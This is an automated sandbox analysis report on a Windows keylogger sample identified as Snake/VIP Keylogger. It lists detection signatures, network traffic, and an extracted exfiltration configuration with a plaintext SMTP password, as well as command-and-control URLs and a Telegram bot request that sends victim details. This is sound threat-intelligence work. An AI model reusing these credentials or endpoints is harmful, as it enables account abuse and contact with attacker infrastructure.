Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe

Overview

General Information

Sample name:1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Analysis ID:1520417
MD5:b046211fe3f420a9ceb7663a560ece96
SHA1:785a1cff39f2a75cbfffed3d718e9e026b3c80a1
SHA256:96134c810750cc56e372551f8070f06aee80ae0cc8eeac983502d6b8f66c77df
Tags:base64-decodedexeuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "info@lamela.si", "Password": "2014viks5961lamela", "Host": "mail.lamela.si", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "info@lamela.si", "Password": "2014viks5961lamela", "Host": "mail.lamela.si", "Port": "587", "Version": "4.4"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2e5e6:$a1: get_encryptedPassword
          • 0x2e8ea:$a2: get_encryptedUsername
          • 0x2e404:$a3: get_timePasswordChanged
          • 0x2e4ff:$a4: get_passwordField
          • 0x2e5fc:$a5: set_encryptedPassword
          • 0x2fc88:$a7: get_logins
          • 0x2fbeb:$a10: KeyLoggerEventArgs
          • 0x2f850:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 2 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2e3e6:$a1: get_encryptedPassword
                • 0x2e6ea:$a2: get_encryptedUsername
                • 0x2e204:$a3: get_timePasswordChanged
                • 0x2e2ff:$a4: get_passwordField
                • 0x2e3fc:$a5: set_encryptedPassword
                • 0x2fa88:$a7: get_logins
                • 0x2f9eb:$a10: KeyLoggerEventArgs
                • 0x2f650:$a11: KeyLoggerEventArgsEventHandler
                00000000.00000002.1510453566.0000000002A81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
                  Click to see the 4 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                      0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                        0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                          0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                          • 0x2e5e6:$a1: get_encryptedPassword
                          • 0x2e8ea:$a2: get_encryptedUsername
                          • 0x2e404:$a3: get_timePasswordChanged
                          • 0x2e4ff:$a4: get_passwordField
                          • 0x2e5fc:$a5: set_encryptedPassword
                          • 0x2fc88:$a7: get_logins
                          • 0x2fbeb:$a10: KeyLoggerEventArgs
                          • 0x2f850:$a11: KeyLoggerEventArgsEventHandler
                          Click to see the 2 entries

                          Sigma Signatures

                          No Sigma rule has matched

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-09-27T10:47:31.786222+020028033053Unknown Traffic192.168.2.749701188.114.97.3443TCP
                          2024-09-27T10:47:32.974719+020028033053Unknown Traffic192.168.2.749703188.114.97.3443TCP
                          2024-09-27T10:47:34.175636+020028033053Unknown Traffic192.168.2.749705188.114.97.3443TCP
                          2024-09-27T10:47:38.978463+020028033053Unknown Traffic192.168.2.749713188.114.97.3443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-09-27T10:47:30.112737+020028032742Potentially Bad Traffic192.168.2.749699158.101.44.24280TCP
                          2024-09-27T10:47:31.175032+020028032742Potentially Bad Traffic192.168.2.749699158.101.44.24280TCP
                          2024-09-27T10:47:32.424999+020028032742Potentially Bad Traffic192.168.2.749702158.101.44.24280TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeAvira: detected
                          Antivirus detection for URL or domain
                          Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                          Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                          Found malware configuration
                          Source: 00000000.00000002.1510453566.0000000002A81000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "info@lamela.si", "Password": "2014viks5961lamela", "Host": "mail.lamela.si", "Port": "587", "Version": "4.4"}
                          Source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "info@lamela.si", "Password": "2014viks5961lamela", "Host": "mail.lamela.si", "Port": "587", "Version": "4.4"}
                          Multi AV Scanner detection for submitted file
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeReversingLabs: Detection: 65%
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Machine Learning detection for sample
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeJoe Sandbox ML: detected

                          Location Tracking

                          barindex
                          Tries to detect the country of the analysis system (by using the IP)
                          Source: unknownDNS query: name: reallyfreegeoip.org
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49700 version: TLS 1.0
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49716 version: TLS 1.2
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.0000000006248000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.Core.pdbP source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.ni.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.0000000006211000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.ni.pdbRSDS source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Configuration.ni.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.0000000006211000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.Configuration.pdbh source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.ni.pdbRSDS source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Security.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Configuration.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.pdbMZ source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Xml.ni.pdbRSDS# source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Core.ni.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: Microsoft.VisualBasic.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Windows.Forms.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Web.Extensions.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.000000000625D000.00000004.00000020.00020000.00000000.sdmp, WER1929.tmp.dmp.12.dr
                          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.00000000061DE000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.pdb\t source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: mscorlib.ni.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1513483890.0000000006211000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.Core.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Windows.Forms.pdbSystem.ni.dllp source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.ni.pdb source: WER1929.tmp.dmp.12.dr
                          Source: Binary string: System.Core.ni.pdbRSDS source: WER1929.tmp.dmp.12.dr
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 4x nop then jmp 00ECF8E9h0_2_00ECF62F
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 4x nop then jmp 00ECFD41h0_2_00ECFA88
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 4x nop then jmp 067024C0h0_2_067020A8
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 4x nop then jmp 06701C21h0_2_06701970
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 4x nop then jmp 0670EBF9h0_2_0670E950
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h0_2_06700673
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 4x nop then jmp 0670F901h0_2_0670F658
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 4x nop then jmp 0670C939h0_2_0670C690
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 4x nop then jmp 0670DA99h0_2_0670D7F0
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 4x nop then jmp 0670E7A1h0_2_0670E4F8
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 4x nop then jmp 0670C4E1h0_2_0670C238
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 4x nop then jmp 0670F4A9h0_2_0670F200
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 4x nop then jmp 067024C0h0_2_067023EE
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 4x nop then jmp 0670D641h0_2_0670D398
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h0_2_06700040
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 4x nop then jmp 0670E349h0_2_0670E0A0
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 4x nop then jmp 0670D1E9h0_2_0670CF40
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 4x nop then jmp 0670DEF1h0_2_0670DC48
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 4x nop then jmp 0670C089h0_2_0670BDE0
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 4x nop then jmp 0670F051h0_2_0670EDA8
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 4x nop then jmp 0670CD91h0_2_0670CAE8
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 4x nop then jmp 0670FD59h0_2_0670FAB0
                          Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h0_2_06700853

                          Networking

                          barindex
                          Uses the Telegram API (likely for C&C communication)
                          Source: unknownDNS query: name: api.telegram.org
                          Yara detected Generic Downloader
                          Source: Yara matchFile source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20and%20Time:%2027/09/2024%20/%2015:33:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20642294%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                          Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
                          Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: unknownDNS query: name: checkip.dyndns.org
                          Source: unknownDNS query: name: reallyfreegeoip.org
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49699 -> 158.101.44.242:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49702 -> 158.101.44.242:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49703 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49701 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49705 -> 188.114.97.3:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49713 -> 188.114.97.3:443
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49700 version: TLS 1.0
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20and%20Time:%2027/09/2024%20/%2015:33:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20642294%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 27 Sep 2024 08:47:41 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeString found in binary or memory: http://aborters.duckdns.org:8081
                          Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exeString found in binary or memory: http://anotherarmy.dns.army:8081
